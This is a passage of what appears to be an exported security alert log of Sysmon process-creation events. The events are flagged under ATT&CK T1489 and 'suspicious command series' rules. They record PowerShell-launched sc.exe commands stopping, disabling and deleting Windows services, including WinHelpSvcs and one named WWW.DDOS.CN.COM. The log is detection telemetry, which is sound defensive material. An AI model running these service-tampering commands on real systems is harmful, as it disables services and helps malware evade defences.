12:51:31.878"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010767b2b00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.851",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.716 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00105c792b00} +ProcessId: 4716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.716163400Z"",""eventRecordID"":""3253"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.716\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00105c792b00}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.716"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-00105c792b00}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.828",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.679 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00106c782b00} +ProcessId: 8088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.689380500Z"",""eventRecordID"":""3252"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.679\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-00106c782b00}\r\nProcessId: 8088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.679"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-00106c782b00}"",""processId"":""8088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.793",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.330 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d3722b00} +ProcessId: 984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.346497100Z"",""eventRecordID"":""3249"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.330\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d3722b00}\r\nProcessId: 984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:31.330"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010d3722b00}"",""processId"":""984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.146",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.134 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00} +ProcessId: 8056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.152121600Z"",""eventRecordID"":""3246"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.134\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.134"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.127",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.104 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d76c2b00} +ProcessId: 7644 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
WinHelpSvcs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelpSvcs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.115759500Z"",""eventRecordID"":""3245"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.104\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d76c2b00}\r\nProcessId: 7644\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelpSvcs Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.104"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010d76c2b00}"",""processId"":""7644"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelpSvcs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.091",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.062 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010256b2b00} +ProcessId: 5664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.067751000Z"",""eventRecordID"":""3243"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.062\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010256b2b00}\r\nProcessId: 5664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.062"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010256b2b00}"",""processId"":""5664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 